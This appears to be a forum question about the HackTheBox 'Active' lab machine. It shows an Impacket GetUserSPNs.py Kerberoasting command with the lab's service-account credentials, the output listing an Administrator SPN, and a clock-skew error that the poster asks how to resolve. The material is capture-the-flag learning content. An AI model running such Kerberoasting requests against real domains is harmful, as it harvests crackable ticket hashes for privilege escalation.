ACTIVE MACHINE-KERBEROS

When using ./GetUserSPNs.py with password, the following error is displayed.
./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon


active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2018-07-30 22:47:40.656520

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

root@kali:~/Documents/active100# timedatectl status
Local time: Tue 2019-07-16 10:53:12 IST
Universal time: Tue 2019-07-16 05:23:12 UTC
RTC time: Tue 2019-07-16 05:23:12
Time zone: Asia/Kolkata (IST, +0530)
System clock synchronized: yes
NTP service: inactive
RTC in local TZ: no

How to resolve.